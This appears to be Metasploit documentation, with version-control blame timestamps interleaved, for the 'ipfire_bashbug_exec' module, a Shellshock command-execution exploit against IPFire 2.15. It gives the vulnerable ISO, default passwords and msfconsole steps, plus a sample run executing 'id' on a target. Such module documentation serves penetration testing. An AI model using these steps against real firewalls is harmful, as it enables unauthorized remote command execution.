2016-05-29 20:40:12 -04:00
|
|
|
## Vulnerable Application
|
|
|
|
|
|
|
|
|
|
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.15-core82/ipfire-2.15.i586-full-core82.iso)
|
|
|
|
|
Archived Copy: [github](https://github.com/h00die/MSF-Testing-Scripts)
|
|
|
|
|
|
|
|
|
|
## Verification Steps
|
|
|
|
|
|
|
|
|
|
1. Install the firewall
|
|
|
|
|
2. Start msfconsole
|
|
|
|
|
3. Do: ```use exploit/linux/http/ipfire_bashbug_exec```
|
|
|
|
|
4. Do: ```set rhost 10.10.10.10```
|
2016-05-30 06:33:48 -04:00
|
|
|
5. Do: ```set PASSWORD admin```
|
|
|
|
|
6. Do: ```set CMD ls```
|
|
|
|
|
7. Do: ```run```
|
|
|
|
|
8. You should see the output of the command that was run.
|
2016-05-29 20:40:12 -04:00
|
|
|
|
|
|
|
|
## Options
|
|
|
|
|
|
2025-10-15 16:05:53 -04:00
|
|
|
### PASSWORD
|
2016-05-29 20:40:12 -04:00
|
|
|
|
|
|
|
|
Password is set at install. May be blank, 'admin', or 'ipfire'.
|
|
|
|
|
|
2025-10-15 16:05:53 -04:00
|
|
|
### CMD
|
2016-05-29 20:40:12 -04:00
|
|
|
|
|
|
|
|
This is the command to run on the system.
|
|
|
|
|
|
|
|
|
|
## Scenarios
|
|
|
|
|
|
|
|
|
|
Example of running the ID command
|
|
|
|
|
```
|
|
|
|
|
msf > use exploit/linux/http/ipfire_bashbug_exec
|
|
|
|
|
msf exploit(ipfire_bashbug_exec) > set PASSWORD admin
|
|
|
|
|
PASSWORD => admin
|
|
|
|
|
msf exploit(ipfire_bashbug_exec) > set rhost 192.168.2.202
|
|
|
|
|
rhost => 192.168.2.202
|
|
|
|
|
msf exploit(ipfire_bashbug_exec) > set CMD id
|
|
|
|
|
CMD => id
|
|
|
|
|
msf exploit(ipfire_bashbug_exec) > exploit
|
|
|
|
|
|
|
|
|
|
[+] uid=99(nobody) gid=99(nobody) groups=16(dialout),23(squid),99(nobody)
|
|
|
|
|
[*] Exploit completed, but no session was created.
|
|
|
|
|
```
|
